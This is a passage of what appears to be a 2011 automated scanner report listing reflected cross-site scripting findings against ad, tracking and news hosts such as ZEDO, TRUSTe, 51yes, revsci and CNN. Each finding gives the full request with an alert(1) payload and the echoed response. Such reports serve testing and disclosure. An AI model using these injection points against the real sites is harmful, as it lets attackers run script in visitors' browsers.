User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:417bf';alert(1)//f75064a5c68;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',417bf';alert(1)//f75064a5c68';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,417bf';alert(1)//f75064a5c68;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasA
...[SNIP]...

1.36. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d52"%3balert(1)//b5654298ad1 was submitted in the q parameter. This input was echoed as 76d52";alert(1)//b5654298ad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=76d52"%3balert(1)//b5654298ad1&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='76d52";alert(1)//b5654298ad1';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=76d52";alert(1)//b5654298ad1;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.37. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe1bd'%3balert(1)//2f29b929aac was submitted in the q parameter. This input was echoed as fe1bd';alert(1)//2f29b929aac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=fe1bd'%3balert(1)//2f29b929aac&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='fe1bd';alert(1)//2f29b929aac';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=fe1bd';alert(1)//2f29b929aac;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd
...[SNIP]...

1.38. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 49938<script>alert(1)</script>4702d2d7a79 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont1049938<script>alert(1)</script>4702d2d7a79&w=300&h=250&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
cbe7-itl',
                           'iconSpanId':'te-clr1-d01e0059-a348-4046-bc2e-970a3218cbe7-icon',
                           'backgroundColor':'white',
                           'opacity':.8,
                           'filterOpacity':80.0,
                           'containerId':'att02cont1049938<script>alert(1)</script>4702d2d7a79',
                           'noticeBaseUrl':'http://choices-elb.truste.com/camsg?',
                           'irBaseUrl': 'http://choices-elb.truste.com/cair?',
                           'interstitial':te_clr1_d01e0059_a348_4046_bc2e_970a3218cbe7_ib,
                   
...[SNIP]...

1.39. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5b44b<script>alert(1)</script>fc4461e59db was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x2505b44b<script>alert(1)</script>fc4461e59db&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37911
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl300x2505b44b<script>alert(1)</script>fc4461e59db" target="_blank">
...[SNIP]...

1.40. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 7a4c1<script>alert(1)</script>805cb70c449 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr7a4c1<script>alert(1)</script>805cb70c449 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
5-a7e0-55208c6ffa8b',
                           'anchName':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-anch',
                           'width':300,
                           'height':250,
                           'ox':0,
                           'oy':0,
                           'plc':'tr',
                           'iplc':'ctr7a4c1<script>alert(1)</script>805cb70c449',
                           'intDivName':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-itl',
                           'iconSpanId':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-icon',
                           'backgroundColor':'white',
                           'opacity':.8
...[SNIP]...

1.41. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload d8568<script>alert(1)</script>f345ba26024 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=trd8568<script>alert(1)</script>f345ba26024&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
lr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc',
                           'anchName':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-anch',
                           'width':300,
                           'height':250,
                           'ox':0,
                           'oy':0,
                           'plc':'trd8568<script>alert(1)</script>f345ba26024',
                           'iplc':'ctr',
                           'intDivName':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-itl',
                           'iconSpanId':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-icon',
                           'backgroundColor':'white'
...[SNIP]...

1.42. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 15496<script>alert(1)</script>3213bac3295 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=1000215496<script>alert(1)</script>3213bac3295&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:53 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 37870

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
truste.com/assets/ad_choices_i.png',
                           'icon_cam_mo': 'http://choices.truste.com/assets/ad_choices_en.png',
                           'iconText':'',
                           'aid':'att02',
                           'pid':'mec01',
                           'zindex':'1000215496<script>alert(1)</script>3213bac3295',
                           'cam':'2',
                           'cid':'0511wl300x250'
                       };

   truste.ca.bindingInitMap[te_clr1_74e886fc_d4d4_4cc9_9ab1_a7edb6906a41_bi.baseName] = 0;
   truste.ca.intInitMap[te_clr1_74e886fc_d4d4_4cc9_9ab
...[SNIP]...

1.43. http://count36.51yes.com/click.aspx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1744e'%3balert(1)//23fa84b4e34 was submitted in the id parameter. This input was echoed as 1744e';alert(1)//23fa84b4e34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click.aspx?id=3602172621744e'%3balert(1)//23fa84b4e34&logo=12 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1750


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...
<a href="http://countt.51yes.com/index.aspx?id=3602172621744e';alert(1)//23fa84b4e34" target=_blank title="51YES............">
...[SNIP]...

1.44. http://count36.51yes.com/click.aspx [logo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e549a'%3balert(1)//3d03e16b003 was submitted in the logo parameter. This input was echoed as e549a';alert(1)//3d03e16b003 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click.aspx?id=360217262&logo=12e549a'%3balert(1)//3d03e16b003 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1806


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...
<img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count36.51yes.com/count12e549a';alert(1)//3d03e16b003.gif" alt="51YES............">
...[SNIP]...

1.45. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload dd8f4<script>alert(1)</script>b2cc88b9f33 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=A09801dd8f4<script>alert(1)</script>b2cc88b9f33 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; rtc_wwje=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9Za/2KdJo=; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlJtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGCxalPCFyDSiKJPgnHQBQDLJ3Rr4nnHKDvxdFk=; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Aug 2011 18:44:57 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Aug 2011 18:44:57 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:44:57 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A09801DD8F4<SCRIPT>ALERT(1)</SCRIPT>B2CC88B9F33" was not recognized.
*/

1.46. http://newspulse.cnn.com/widget/json/social [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newspulse.cnn.com
Path:   /widget/json/social

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 70c67<script>alert(1)</script>5505425b56e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/json/social?callback=jsonp131343402923870c67<script>alert(1)</script>5505425b56e&ids=768212f4d9c05b6c047059f0d80d78e0%2C768212f4d9c05b6c047059f0d80d78e0%2Cfa1930d5d87d06aeb18a1b0d2bc36ea2%2C762e86ff030cdfdcfd2dea6146211073%2C29a5dd7685c2606e3c83b6b52a2d6ab1%2Cae6fa2789fb64bc7ef840e25c8b4984d HTTP/1.1
Host: newspulse.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:06 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:53:06 GMT
Last-Modified: Mon, 15 Aug 2011 18:48:06 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 499

